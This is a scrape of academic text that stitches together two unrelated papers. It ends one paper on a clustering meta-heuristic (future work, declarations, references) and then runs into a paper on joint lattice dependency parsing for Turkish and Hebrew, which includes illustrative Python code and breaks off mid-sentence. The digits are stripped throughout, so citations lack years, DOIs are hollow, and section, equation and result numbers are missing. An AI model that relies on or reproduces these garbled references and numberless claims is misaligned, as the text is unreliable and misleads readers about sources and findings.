hence, the drg meta-heuristic can be a suitable alternative when compared to cs and ts regarding time, and a more efficient method when compared to vns, sa, ga, and ckm. the future work is focused on improving the performance of the drg based on the following key aspects: � the em algorithm was found to be functional with up to gaussian components for the clustering process (see discussion on section “dispersion reduction in gmms performance for the cccp”). in this case the analysis of the infinite gaussian mixture model described in rasmussen ( ) may lead to overcome this restriction. � while most optimization methods such as those based on mixed integer linear programming (milp) or meta-heuristics are purely quantitative, modeling of qualitative criteria may improve the optimization task. in example, in hadi-vencheh & mohamadghasemi ( ) a methodology that integrated the analytic hierarchy process (ahp) and a nonlinear programming model (nlp) provided very suitable solution for a facility layout problem. such approach may lead to improve the solving methods for other logistic problems such as the facility location problem. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � integration with state-of-the-art meta-heuristics such as migrating birds optimization (mbo) (niroomand et al., ) and mat-heuristics (sartori & buriol, ). additional information and declarations funding the author received no funding for this work. competing interests the author declares that they have no competing interests. author contributions � santiago-omar caballero-morales conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code and test instances of the considered databases are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bishop cm. . pattern recognition and machine learning. new york: springer science and business media, llc. carvalho r, mendes g, azeredo-chaves f. . a heuristic for the capacitated clustering problem. in: in proceeding of the xlix simposio brasileiro de pesquisa operacional. – . chaves aa, correa fa, lorena lan. . clustering search heuristic for the capacitated p-median problem. advances in software computing series : – . chaves aa, nogueira-lorena la. . clustering search algorithm for the capacitated centered clustering problem. computers & operations research ( ): – doi . /j.cor. . . . chaves aa, nogueira-lorena la. . hybrid evolutionary algorithm for the capacitated centered clustering problem. expert systems with applications ( ): – doi . /j.eswa. . . . de-oliveira acm, chaves aa, nogueira-lorena la. . clustering search. pesquisa operacional ( ): – doi . /s - . fernandes-muritiba ae, negreiros m, gois-oria hl, ferreira de souza m. . a tabu search algorithm for the capacitated centred clustering problem. in: congreso latino- iberoamericano de investigacion operativa (claio)— simposio brasileiro de pesquisa operacional (sbpo). – . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. 
#supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ forsyth d. . lecture notes of cs signals ai: gaussian classifiers. illinois: university of illinois, urbana-champaign. fraley c, raftery a. . how many clusters? which clustering method? answers via model- based cluster analysis. computer journal ( ): – doi . /comjnl/ . . . hadi-vencheh a, mohamadghasemi a. . an integrated ahp–nlp methodology for facility layout design. journal of manufacturing systems ( ): – doi . /j.jmsy. . . . hansen p, jaumard b. . cluster analysis and mathematical programming. mathematical programming : – . herda m. . combined genetic algorithm for capacitated p-median problem. in: proc. of the th ieee international symposium on computational intelligence and informatics, cinti . piscataway: ieee, – . mahmoodi-darani n, ahmadi v, saadati eskandari z, yousefikhoshbakht m. . solving the capacitated clustering problem by a combined meta-heuristic algorithm. journal of advances in computer research ( ): – . mclachlan gf, rathnayake s. . on the number of components in a gaussian mixture model. wiley interdisciplinary reviews: data mining and knowledge discovery ( ): – doi . /widm. . mohamadghasemi a, hadi-vencheh a. . an integrated synthetic value of fuzzy judgments and nonlinear programming methodology for ranking the facility layout patterns. computers & industrial engineering ( ): – doi . /j.cie. . . . mohammed m, badruddin m, mohammed e. . machine learning: algorithms and applications. milton park: crc press, taylor & francis group. negreiros m, palhano a. . the capacitated centred clustering problem. computers & operations research ( ): – doi . /j.cor. . . . niroomand s, hadi-vencheh a, sahin r, vizvari b. . modified migrating birds optimization algorithm for closed loop layout with exact distances in flexible manufacturing systems. expert systems with applications ( ): – doi . /j.eswa. . . . palhano a, negreiros m, laporte g. . a constrained k-median procedure for the capacitated centered clustering problem. in: proceeding of the xiv congreso latino ibero americano de investigacion de operaciones, claio . pereira wm, carvalho r. . ils-pr: an efficient heuristic for the capacitated centered clustering problem. proceeding series of the brazilian society of computational and applied mathematics ( ): – . pereira ma, senne lf. . a column generation method for the capacitated centred clustering problem. in: proceedings of the vi alio/euro workshop on applied combinatorial optimization. – . radiah s, hasnah n, omar m. . an alternative heuristic for capacitated p-median problem (cpmp). in: proceeding of the ieee business engineering and industrial applications colloquium, beiac . – . rasmussen c. . the infinite gaussian mixture model. in: solla sa, leen tk, müller kr, eds. advances in neural information processing systems. vol. . cambridge: mit press, – . sartori cs, buriol ls. . a study on the pickup and delivery problem with time windows: matheuristics and new instances. computers & operations research ( ): – doi . /j.cor. . . theodoridis s, koutroumbas k. . pattern recognition. second edition. san diego: elsevier academic press. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /comjnl/ . . http://dx.doi.org/ . /j.jmsy. . . http://dx.doi.org/ . /widm. http://dx.doi.org/ . /j.cie. . . 
Theodoridis S, Koutroumbas K. An introduction to pattern recognition: a MATLAB approach. Cambridge: Academic Press.
Yousefikhoshbakht M, Khorram E. Solving the vehicle routing problem by a hybrid meta-heuristic algorithm. Journal of Industrial Engineering International.
A graph-based lattice dependency parser for joint morphological segmentation and syntactic analysis
Wolfgang Seeker and Özlem Çetinoğlu
Institut für Maschinelle Sprachverarbeitung, University of Stuttgart
{seeker,ozlem}@ims.uni-stuttgart.de

Abstract
Space-delimited words in Turkish and Hebrew text can be further segmented into meaningful units, but syntactic and semantic context is necessary to predict segmentation. At the same time, predicting correct syntactic structures relies on correct segmentation. We present a graph-based lattice dependency parser that operates on morphological lattices to represent different segmentations and morphological analyses for a given input sentence. The lattice parser predicts a dependency tree over a path in the lattice and thus solves the joint task of segmentation, morphological analysis, and syntactic parsing. We conduct experiments on the Turkish and the Hebrew treebank and show that the joint model outperforms three state-of-the-art pipeline systems on both data sets. Our work corroborates findings from constituency lattice parsing for Hebrew and presents the first results for full lattice parsing on Turkish.

Introduction
Linguistic theory has provided examples from many different languages in which grammatical information is expressed via case marking, morphological agreement, or clitics. In these languages, configurational information is less important than in English, since the words are overtly marked for their syntactic relations to each other. Such morphologically rich languages pose many new challenges to today's natural language processing technology, which has often been developed for English.
One of the first challenges is the question of how to represent morphologically rich languages and what the basic units of analysis are (Tsarfaty et al.). The Turkish treebank (Oflazer et al.), for example, represents words as sequences of inflectional groups, semantically coherent groups of morphemes separated by derivational boundaries. The treebank for Modern Hebrew (Sima'an et al.) chooses morphemes as the basic unit of representation. A space-delimited word in the treebank can consist of several morphemes that may belong to independent syntactic contexts.
Both Turkish and Hebrew show high amounts of ambiguity when it comes to the correct segmentation of words into inflectional groups and morphemes, respectively. Within a sentence, however, these ambiguities can often be resolved by the syntactic and semantic context in which these words appear.
A standard (dependency) parsing system decides segmentation, morphological analysis (including POS), and syntax one after the other in a pipeline setup. While pipelines are fast and efficient, they cannot model interaction between these different levels of analysis. It has therefore been argued that joint modeling of these three tasks is more suitable to the problem (Tsarfaty). In previous research, several transition-based parsers have been proposed to model POS/morphological tagging and parsing jointly (Hatori et al.; Bohnet and Nivre; Bohnet et al.). Such parsing systems have been further extended to also solve the segmentation problem in Chinese (Hatori et al.; Li and Zhou; Zhang et al.).
transition-based parsers are attractive since they do not rely on global optimization and thus deal well with the increased model complexity that comes with joint modeling. nonetheless, graph-based models have been proposed as well, e.g. by li et al. ( ) for joint pos tagging and dependency parsing. their parsers model the joint problem directly at the cost of increased model complexity. in this paper, we present a graph-based dependency parser for lattice parsing that handles the increased complexity by applying dual decomposition. the parser operates on morphological lattices and predicts word segmentation, morphological analysis, and dependency syntax jointly. it decomposes the problem into several subproblems and uses dual decomposition to find a common solution (koo et al., ; martins et al., ). the subproblems are defined such that they can be solved efficiently and agreement is found in an iterative fashion. decomposing the problem thus keeps the complexity of the joint parser on a tractable level. we test the parser on the turkish and the hebrew treebank. the segmentation problem in these languages can be tackled with the same approach even though their underlying linguistic motivation is quite different. in our experiments, the lattice dependency parser outperforms three state-of-the-art pipeline systems. lattice parsing for hebrew has been thoroughly investigated in constituency parsing (cohen and smith, ; goldberg and tsarfaty, ; goldberg and elhadad, ), demonstrating the viability of joint modeling. to the best of our knowledge, our work is the first to apply full lattice parsing to the turkish treebank. we introduce the segmentation problem in turkish and hebrew in section and present the lattice parser in section . sections and describe the experiments and their results and we discuss related work in section . we conclude with section . word segmentation in turkish and hebrew a lot of morphosyntactic information is overtly marked on words in morphologically rich languages. it is also common to express syntactic information through derivation or composition. as a consequence, these words, orthographically written together, actually have word-internal syntactic structures. moreover, word-external relations may depend on the word-internal structures, e.g., a word could be grammatically related to only parts of another word instead of the whole. for instance, in the turkish sentence ekmek aldım, each word has two analyses. ekmek means 'bread' or the nominal 'planting' which is derived from the verb stem ek 'plant' with the nominalization suffix mek. aldım has the meaning 'i bought', which decomposes as al-dı-m 'buy-past- sg'. it also means 'i was red', which is derived from the adjective al 'red', inflected for past tense, st person singular. depending on the selected morphological analysis for each word, syntax and semantics of the sentence change. when the first analysis is selected for both words, the syntactic representation of the sentence is given in figure , which corresponds to the meaning 'i bought bread'. when the nominal 'planting' is selected for the first word, it is a grammatical sentence albeit with an implausible meaning.
when the derivational analysis of the second word is se- lected, regardless of the morphological analysis of the first word, the sentence is ungrammatical due to subject-verb agreement failure. although all mor- phological analyses for these two words are correct in isolation, when they occur in the same syntactic context only some combinations are grammatical. ekmek aldım noun+nom verb+past+ sg obj i bought bread. figure : dependency representation for ekmek aldım. this small example demonstrates that the syntac- tic structure depends on the morphological disam- biguation of the words. at the same time, it shows that syntax can help pick the right morphological analysis. for a joint system to decide the morphological and syntactic representation together, all possible analyses must be available to the system. the pos- sible morphological analyses of a word can be effi- ciently represented in a lattice structure. the lattice representation of the sentence in figure is given in figure , with double circles denoting word bound- aries. a sentence lattice is the concatenation of its word lattices. a morphological analysis of a word is a full path from the initial state to the final state of its lattice. labels on the transitions are the surface form and underlying morphological representation of segments. ekmek /noun+nom ek /verb mek /inf+noun+nom aldım/verb+past+ sg al /adj dım/verb+past+ sg figure : a morphological lattice for ekmek aldım. lattices also capture well the segmentation of words in hebrew. different from turkish, hebrew segments can be syntactic units like determiners, prepositions, or relativizers attached to stem seg- ments. in an example given by goldberg and tsar- faty ( ), the word hneim ‘the pleasant/made- pleasant’ has three analyses corresponding to the lat- tice in figure . hneim/vb h/dt neim/vb neim/jj figure : the lattice for hneim (goldberg and tsarfaty, ). both the hebrew and the turkish treebank anno- tate dependencies between units smaller than words. in the turkish treebank, a space-delimited word is segmented into one or more segments depending on its morphological representation. the number of segments is determined by the number of deriva- tions. if it was derived n times, it is represented as n+ segments. the derivational boundaries are part of the morphological representation. in the turkish dependency parsing literature (eryiğit et al., ; çetinoğlu and kuhn, ) these segments surface forms on the transitions are given for convenience. in the turkish treebank, only final segments have surface forms (of full words), the surface forms of non-final segments are rep- resented as underscores. are called inflectional groups (igs). igs consist of one or more inflectional morphemes. the head of a non-final ig is the ig to its right with a dependency relation deriv. the head of a final ig could be any ig of another word. the hebrew treebank defines relations between morphemes (sima’an et al., ). those mor- phemes correspond to what is usually considered a separate syntactic unit in english. in hebrew script, word classes like prepositions and conjunctions are always written together with the following word. contrary to turkish, syntactic heads of both non- final and final segments can be internal or external to the same space-delimited word. for convenience, we will use token to refer to the smallest unit of processing for the remainder of the paper. it corresponds to igs in turkish and mor- phemes in hebrew. 
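to make the lattice representation concrete, the following sketch is an illustration added here (not code from the paper): it encodes the ekmek aldım lattice described above as a list of transitions between numbered states, where the state numbers and the exact tag strings are assumptions made for the example only. enumerating every path from the initial to the final state recovers the four complete analyses of the sentence, of which the parser has to pick one.

    # illustrative lattice for "ekmek aldım"; each transition carries a surface
    # segment and its morphological analysis; the word-boundary ("double circle")
    # states are 0, 2 and 4 in this toy encoding.
    EKMEK_ALDIM = [
        # (source state, target state, (surface segment, morphological analysis))
        (0, 2, ("ekmek", "Noun+Nom")),        # 'bread'
        (0, 1, ("ek",    "Verb")),            # verb stem 'plant'
        (1, 2, ("mek",   "Inf+Noun+Nom")),    # nominalisation: 'planting'
        (2, 4, ("aldım", "Verb+Past+1sg")),   # 'i bought'
        (2, 3, ("al",    "Adj")),             # 'red'
        (3, 4, ("dım",   "Verb+Past+1sg")),   # 'i was (red)'
    ]

    def enumerate_paths(lattice, state, final):
        """yield every full path (list of transition labels) from `state` to `final`."""
        if state == final:
            yield []
            return
        for src, tgt, label in lattice:
            if src == state:
                for rest in enumerate_paths(lattice, tgt, final):
                    yield [label] + rest

    # prints the four complete morphological analyses of the sentence
    for path in enumerate_paths(EKMEK_ALDIM, 0, 4):
        print(" ".join(f"{surface}/{analysis}" for surface, analysis in path))
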
a transition in a morphological lattice therefore represents one token. we will use word to refer to space-delimited words. in stan- dard parsing, these two terms usually coincide with a token in a sentence being separated from the sur- rounding ones by space. lattice parsing one can think of lattice parsing as two tasks that the parser solves simultaneously: the parser needs to find a path through the lattice and it needs to find a parse tree. importantly, the parser solves this task under the condition that the parse tree and the path agree with each other, i.e. the tokens that the parse tree spans over must form the path through the lat- tice. decomposing the problem in this way defines the three components for the parser. let x be an input lattice and t = {root, t , t , . . . , tn} be the set of tokens in x. in what follows, we assume two different struc- tures, lattices and dependency trees. dependency trees are represented as directed acyclic trees with a special root node (root), whereas lattices are directed acyclic graphs with one defined start state and one defined end state (see figures and ). for dependency trees, we will use the terms node and arc to refer to the vertices and the edges between the vertices, respectively. tokens are represented as this is a technical definition of word and has no ambition to make claims about the linguistic definition of a word. nodes in the dependency tree. for lattices, we use the terms state and transition to refer to the vertices and their edges in the lattice. tokens are represented as transitions between states in the lattice. find the path. a token bigram in a lattice x is a pair of two transitions 〈t,t′〉, such that the target state of t in x coincides with the source state of t′ in x. a chain of overlapping bigrams that starts from the initial state and ends in the final state forms a path through the lattice. we represent the root to- ken as the first transition, i.e. a single transition that leaves the initial state of the lattice. given a lattice x, we define the index set of to- ken bigrams in the lattice to be s := {〈t,t′〉 |t,t′ ∈ t, target(x,t) = source(x,t′)}. for later, we fur- thermore define s|t := {〈k,t〉 |〈k,t〉 ∈ s, k ∈ t } to be the set of bigrams that have t at the second position. a consecutive path through the lattice is defined as an indicator vector p := 〈ps〉s∈s where ps = means that bigram s is part of the path, oth- erwise ps = . we define p as the set of all well- formed paths, i.e. all paths that lead from the initial to the final state. we use a linear model that factors over bigrams. given a scoring function fp that assigns scores to paths, the path with the highest score can be found by p̂ = arg max p∈p fp(p) with fp(p) = ∑ s∈s ps w ·φseg(s) where φseg is the feature extraction function for to- ken bigrams. the highest-scoring path through the lattice can be found with the viterbi algorithm. we use this bigram model later also as a standalone disambiguator for morphological lattices to find the highest-scoring path in a lattice. find the tree. we define the index set of arcs in a dependency tree as a := {〈h,d,l〉 |h ∈ t,d ∈ t −{root}, l ∈ l,h = d} with l being a set of dependency relations. a dependency tree is defined as an indicator vector y := 〈ya〉a∈a where ya = means that arc a is in the parse, otherwise ya = . we define y to be the set of all well-formed depen- dency trees. we follow koo et al. ( ) and assume an arc- factored model (mcdonald et al., ) to find the highest-scoring parse. 
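before the tree component is spelled out below, the path component described above can be made concrete with a minimal sketch. it is our own illustration under assumed conventions: transitions are (source state, target state, token) triples as in the earlier example, and the bigram score w·φseg is abstracted into a user-supplied function; it is not the parser's implementation.

    from collections import defaultdict

    def viterbi_path(transitions, start, final, score):
        """highest-scoring path through an acyclic lattice.

        transitions : list of (source_state, target_state, token)
        score(prev_token, token) -> float   # bigram score; prev_token is None for the
                                            # transition leaving the initial state (root)
        returns the token sequence of the best path from `start` to `final`.
        """
        outgoing, incoming, indegree, states = defaultdict(list), defaultdict(list), defaultdict(int), set()
        for tr in transitions:
            src, tgt, _ = tr
            outgoing[src].append(tr)
            incoming[tgt].append(tr)
            indegree[tgt] += 1
            states.update((src, tgt))

        # topological order of states (kahn's algorithm); lattices are acyclic
        order, queue = [], [s for s in states if indegree[s] == 0]
        while queue:
            s = queue.pop()
            order.append(s)
            for _, tgt, _ in outgoing[s]:
                indegree[tgt] -= 1
                if indegree[tgt] == 0:
                    queue.append(tgt)

        # best[tr] = (score of the best partial path ending in transition tr, backpointer)
        best = {}
        for s in order:
            for tr in outgoing[s]:
                src, _, tok = tr
                if src == start:
                    best[tr] = (score(None, tok), None)
                    continue
                cands = [(best[p][0] + score(p[2], tok), p) for p in incoming[src] if p in best]
                if cands:
                    best[tr] = max(cands)

        # best transition entering the final state, then follow backpointers
        last = max((tr for tr in incoming[final] if tr in best), key=lambda tr: best[tr][0])
        tokens = []
        while last is not None:
            tokens.append(last[2])
            last = best[last][1]
        return tokens[::-1]

with the toy lattice from the earlier sketch, viterbi_path(EKMEK_ALDIM, 0, 4, score) returns one of the four analyses, depending on the bigram scores supplied.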
given a scoring function ft that assigns scores to parses, the problem of finding the highest scoring parse is defined as ŷ = arg max y∈y ft(y) with ft(y) = ∑ a∈a ya w ·φarc(a) where φarc is the feature extraction function for sin- gle arcs and w is the weight vector. we use the chu- liu-edmonds algorithm (cle) to find the highest- scoring parse (chu and liu, ; edmonds, ). note that the algorithm includes all tokens of the lat- tice into the spanning tree, not just some tokens on some path. chu-liu-edmonds furthermore enforces the tree properties of the output, i.e. acyclicity and exactly one head per token. agreement constraints. to make the path and the parse tree agree with each other, we introduce an additional dependency relation norel into l. we define a token that is attached to root with rela- tion norel to be not on the path through the lattice. these arcs are not scored by the statistical model, they simply serve as a means for cle to mark to- kens as not being part of the path by attaching them to root with this relation. the parser can predict the norel label only on arcs attached to root. we introduce two agreement constraints to ensure that (i) all tokens not on the path are marked with norel and must be attached to root and (ii) to- kens cannot be dependents of tokens marked with norel. the first constraint is implemented as an xor (⊕) factor (martins et al., b) over token bigrams and arcs. it states that for a token t, either one of its bigrams or its norel-arc must be active. there is one such constraint for each token in the lattice. ⊕ s∈s|t ps ⊕y〈root,t,norel〉 for all t ∈ t ( ) the second constraint ensures that a token that is part of the path will not be attached to a token that the lattice ensures that always only one of the bigrams with the same token in second position can be part of a path. is not. it thus guarantees the coherence of the de- pendency tree over the path through the lattice. it is implemented as an implication (=⇒) factor (mar- tins et al., ). it states that an active norel arc for a token h implies an inactive arc for all arcs hav- ing h as head. there is one such constraint for each possible arc in the parse. y〈root,h,norel〉 =⇒ ¬y〈h,d,l〉 ( ) for all 〈h,d,l〉 ∈ a,h = root, l = norel deciding on a path through the lattice partitions the tokens into two groups: the ones on the path and the ones that are not. by means of the norel label, the cle is also able to partition the tokens into two groups: the root-norel tokens and the proper dependency tree tokens. the two agreement constraints then make sure that the two partionings agree with each other. the first constraint explicitly links the two partitionings by requiring each token to either belong to the path or to the root-norel tokens. the second constraint ensures that the par- titioning by the cle is consistent, i.e. tokens at- tached to root with norel cannot mix with the other tokens in the tree structure. before the parser outputs the parse the tokens that do not belong to the path/tree are discarded. the objective function of the lattice parser is arg max y∈y,p∈p ft(y) + fp(p) subject to the two agreement constraints in equa- tions ( ) and ( ). we use alternating directions dual decomposi- tion or ad (martins et al., a) to find the op- timal solution to this constrained optimization prob- lem. 
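the two agreement constraints can be stated compactly over indicator sets. the check below is a simplified sketch added here for illustration: it treats the active bigrams and arcs of one candidate solution as plain sets and uses placeholder labels ROOT and NOREL; it only verifies the constraints on a complete assignment and is not how they are handled inside the dual decomposition, where they act as factors.

    ROOT, NOREL = "ROOT", "NOREL"

    def satisfies_agreement(tokens, active_bigrams, active_arcs):
        """check the two agreement constraints on a candidate (path, tree) pair.

        tokens         : all tokens of the lattice (excluding the artificial root)
        active_bigrams : set of pairs (t, t') that are on the chosen path
        active_arcs    : set of triples (head, dependent, label) of the chosen tree
        """
        on_path = {t2 for _, t2 in active_bigrams}
        norel = {d for h, d, l in active_arcs if h == ROOT and l == NOREL}

        # first constraint (xor factor): for every token, exactly one of
        # "some bigram ending in the token is active" and "its root-norel arc is
        # active" must hold.
        for t in tokens:
            if (t in on_path) == (t in norel):
                return False

        # second constraint (implication factor): an active root-norel arc for a
        # token implies that no arc with that token as head may be active.
        for h, _, _ in active_arcs:
            if h in norel:
                return False
        return True
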
cle can be implemented such that its worst case complexity is o(t ), while the viterbi algo- rithm needed to find the path is of worst case com- plexity o(qt ), where q is the number of states in the lattice. instead of combining these two prob- lems directly, which would multiply their complex- ity, ad combines them additively, such that the complexity of the parser is o(k(t + qt )) with k being the number of iterations that ad is run. http://www.ark.cs.cmu.edu/ad / second-order parsing. to facilitate second-order features, we use grandparent-sibling head automata as proposed in koo et al. ( ), which we extend to include dependency relations. the head automata allow the parser to model consecutive sibling and grandparent relations. the architecture of the parser does not need to be changed at all to include the second-order factors. the head automata are simply another component. they compute solutions over the same set of arc indicator variables as the cle and ad thus ensures that the output of the two algo- rithms agrees on the tree structure (koo et al., ). the second-order factors dominate the complexity of the entire parser, since solving the head automata is of complexity o(t l). pruning. we use rule-based and heuristics-based pruning to reduce the search space of the parser. arcs between tokens that lie on competing paths through the lattice are cut away as these tokens can never be in a syntactic relation. for the turkish tree- bank, we introduce an additional rule based on the annotation scheme of the treebank. in the treebank, the igs of a word form a chain with each ig having their head immediately to the right and only the last ig choosing the head freely. for the non-final igs, we therefore restrict the head choice to all igs that can immediately follow it in the lattice. in order to restrict the number of heads, we train a simple pairwise classifier that predicts the best heads for each token. it uses the first-order features of the parser’s feature model. feature model. the parser extracts features for bigrams (path), arcs (first-order), consecutive sib- lings, and grandparent relations (both second order). it uses standard features like word form, lemma, pos, morphological features, head direction, and combinations thereof. context features are more difficult in lattice pars- ing than in standard parsing as the left and right con- text of a token is not specified before parsing. we first extracted context features from all tokens that can follow or precede a token in the lattice. this led to overfitting effects as the model was learning specific lattice patterns. we therefore use latent left and right context and extract features from only one of the left/right neighbor tokens. the latent context is the left/right context token with the highest score from the path features (raw bigram scores, they are not changed by ad ). the parser extracts context from one token in each direction. distance features are also more difficult in lat- tices since the linear distance between two tokens depends on the actual path chosen by the parser. we define distance simply as the length of the shortest path between two tokens in the lattice, but this dis- tance may not coincide with the actual path. context features and distance features show that lattice dependency parsing poses interesting new challenges to feature design. using latent context features is one way of handling uncertain context, compare also the delayed features in hatori et al. ( ). 
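as an illustration of the distance feature just mentioned, the sketch below (our own, reusing the assumed (source, target, token) transition encoding from the earlier examples) computes the length of the shortest lattice path connecting two tokens; directly adjacent tokens get distance 1, and tokens lying on competing paths are reported as unreachable.

    from collections import defaultdict, deque

    def lattice_distance(transitions, t_from, t_to):
        """shortest-path distance (counted in transitions) from token t_from to t_to.

        transitions : list of (source_state, target_state, token)
        t_from, t_to: entries of `transitions`
        returns None when t_to cannot follow t_from on any path (competing paths).
        """
        successors = defaultdict(list)
        for src, tgt, _ in transitions:
            successors[src].append(tgt)

        start, goal = t_from[1], t_to[0]   # state after t_from, state before t_to
        seen, frontier = {start}, deque([(start, 0)])
        while frontier:
            state, between = frontier.popleft()
            if state == goal:
                return between + 1         # +1 so that directly adjacent tokens get 1
            for nxt in successors[state]:
                if nxt not in seen:
                    seen.add(nxt)
                    frontier.append((nxt, between + 1))
        return None
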
a thorough investigation of different op- tions is needed here. learning. we train a discriminative linear model using passive-aggressive online learning (crammer et al., ) with cost-augmented inference (taskar et al., ) and parameter averaging (freund and schapire, ). we use hamming loss over the arcs of the parse tree excluding norel arcs. the model trains one parameter vector that includes fea- tures from the tree and from the path. the maximum number of iterations of ad is set to during training and testing. the algo- rithm sometimes outputs fractional solutions. dur- ing training, the model is updated with these frac- tional solutions, weighting the features and the loss accordingly. during testing, fractional solutions are projected to an integer solution by first running the best-path algorithm with the path posteriors output by ad and afterwards running cle on the selected path weighted by the arc posteriors (martins et al., ). in the experiments, fractional solutions occur in about % of the sentences in the turkish develop- ment set during testing. experimental setup . the turkish data the training set for turkish is the , sentences of the metu-sabancı turkish treebank (oflazer et al., ). the sentences of the itu validation set (eryiğit, ) are used for testing. as there is no separate development set, we split the training set into parts and used of them as development data. all models run on this development set are trained on the remaining parts. we also report re- sults from -fold crossvalidation on the full train- ing set ( cv). we use the detached version of the turkish tree- bank (eryiğit et al., ) where multiword expres- sions are represented as separate tokens. the train- ing set of this version contains sentences with loops. we manually corrected these sentences and use the corrected version in our experiments. the turkish raw input is first passed through a morphological analyzer (oflazer, ) in order to create morphological lattices as input to the parser. gold analyses are added to the training lattices if the morphological analyzer failed to output the correct analyses. for the pipeline systems, the input lattices are disambiguated by running a morphological disam- biguator. we train our own disambiguator using the bigram model from the parser and find the best path through the lattice with the viterbi algorithm. the disambiguator uses the same bigram features as the lattice parser. the morphological disambiguator is trained on the turkish treebank as in çetinoğlu ( ). . the hebrew data the data for hebrew comes from the spmrl shared task (seddah et al., ), which is based on the treebank for modern hebrew (sima’an et al., ). it provides lattices and predisam- biguated input files. the training and development lattices contained a number of circular structures due to self-loops in some states. we automatically re- moved the transitions causing these cycles. input lattices for training were prepared as for turkish by adding the gold standard paths if nec- essary. compared to the turkish data, the hebrew lattices are so large that training times for the lat- tice parser became unacceptable. we therefore used our morphological disambiguator to predict the best paths for each lattice. all transitions in the lat- tice that were not part of one of these paths were discarded. note that the number of actual paths in these pruned lattices is much higher than , since the paths converge after each word. 
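the pruning of the hebrew lattices described above amounts to keeping only transitions that occur on one of the paths proposed by the disambiguator. a minimal sketch of that filtering step (ours; the disambiguator is assumed to return its ranked paths as lists of transitions):

    def prune_lattice(transitions, kept_paths):
        """discard every transition that is not part of at least one kept path.

        transitions : list of (source_state, target_state, token)
        kept_paths  : iterable of paths, each a list of transitions from the disambiguator
        """
        keep = {tr for path in kept_paths for tr in path}
        return [tr for tr in transitions if tr in keep]

because the surviving paths still converge at every word boundary, the pruned lattice encodes many more complete analyses than the number of paths that were kept, as noted above.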
all experiments the corrected version is available on the second author’s webpage. with the joint model for hebrew are conducted on the pruned lattices. as for turkish we preprocess the input lattices for all baselines with our own mor- phological disambiguator. . baselines we compare the lattice parser (joint for turkish, joint for hebrew) to three baselines: mate, turbo, and pipeline. the first two baseline systems are off-the-shelf dependency parsers that currently represent the state-of-the-art. mate parser (bohnet, ; bohnet, ) is a graph-based dependency parser that uses carreras’ decoder (carreras, ) and ap- proximate search (mcdonald and pereira, ) to produce non-projective dependency structures. tur- boparser (martins et al., ) is a graph-based parser that uses a dual decomposition approach and outputs non-projective structures natively. the third baseline system runs the lattice parser on a pre- disambiguated lattice, i.e. in a pipeline setup. all three baselines are pipeline setups and use the same disambiguator to predict a path through the lat- tice. the bigram features in the disambiguator are the same as in the joint model. there is thus no dif- ference between the lattice parser and the baselines with respect to the features that are available during segmentation. as opposed to lattice parsing, base- line systems are trained on the gold standard seg- mentation (and thus gold morphological analyses) in the training data, since automatically predicted paths would not guarantee to be compatible with the gold dependency structures. the purpose of the first two baselines is to com- pare the joint parser to the current state-of-the-art. however, the feature sets are different between the joint parser and the off-the-shelf baselines. a differ- ence in performance between the joint parser and the first two baseline systems may thus simply be caused by a difference in the feature set. the third baseline eliminates this difference in the feature sets since it is the actual lattice parser that is run on a disam- biguated lattice. because the morphological disam- biguator for the pipeline baseline is using the same feature set as the lattice parser (the bigram model), http://code.google.com/p/mate-tools http://www.ark.cs.cmu.edu/turboparser/, version . . the fact that the joint parser is trained and tested on full lattices is the only difference between these two systems. the pipeline baseline thus allows us to test directly the effect of joint decoding compared to a pipeline setup. . evaluation standard labeled and unlabeled attachment scores are not applicable when parsing with uncertain seg- mentation since the number of tokens in the output of the parser may not coincide with the number of tokens in the gold standard. previous work therefore suggests alternative methods for evaluation, e.g. by means of precision, recall, and f-score over tokens, see e.g. tsarfaty ( ) or cohen and smith ( ). the uncertainty of segmentation furthermore makes it very hard to evaluate the other levels of analysis independently of the segmentation. in or- der to decide whether the morphological analysis of a token (or its syntactic attachment) is correct, one always needs to find out first to which token in the gold standard it corresponds. by establishing this correspondence, the segmentation is already being evaluated. evaluating syntax isolated from the other levels of analysis is therefore not possible in general. hatori et al. 
( ) count a dependency relation correct only when both the head and the dependent have the correct morphological analysis (here pos) and segmentation. goldberg ( , page ) pro- poses a similar approach, but only requires surface forms to match between gold standard and predic- tion. these metrics compute precision and recall over tokens. eryiğit et al. ( ) and eryiğit ( ) define an accuracy (igeval) for turkish parsing by taking advantage of the annotation scheme in the turkish treebank: a non-final ig in the turkish tree- bank always has its head immediately to the right, al- ways with the same label, which makes it possible to ignore the inner dependency relations, i.e. the seg- mentation, of a dependent word. the metric there- fore only needs to check for each word whether the head of the last ig is attached to the correct ig in another word. the metric includes a back-off strat- egy in case the head word’s segmentation is wrong. a dependency arc is then counted as correct if it at- taches to an ig in the correct word and the pos tag of the head ig is the same as in the gold standard. parsing evaluation. we follow hatori et al. ( ) and use a strict definition of precision and recall (prec, rec, f ) over tokens to evaluate the full task. we first align the tokens of a word in the parser output with the tokens of the correspond- ing word in the gold standard using the needleman- wunsch algorithm (needleman and wunsch, ), which we modify so it does not allow for mis- matches. a token in the parser output that is not in the gold standard is thus paired with a gap and vice versa. two tokens must have the same morphologi- cal analysis in order to match. a true positive is defined as a pair of matching to- kens whose heads are also aligned and match. for labeled scores, the dependency relations must match as well. precision is defined as the number of true positives over the number of tokens in the predic- tion, recall is defined as the number of true posi- tives over the number of tokens in the gold standard. f-score is the harmonic mean of precision and recall. this metric is very strict and requires all levels of analysis to be correct. in order to evaluate the syntax as independently as possible, we furthermore report igeval for turkish, with and without the aforemen- tioned backoff strategy (igeval and igeval strict). for hebrew, we report on a version of precision and recall as defined above that only requires the surface forms of the tokens to match. this metric is almost the one proposed in goldberg ( ). all reported evaluation metrics ignore punctuation. we do not use tedeval as defined in tsarfaty et al. ( ) even though it has been used previ- ously to evaluate dependency parsing with uncer- tain segmentation 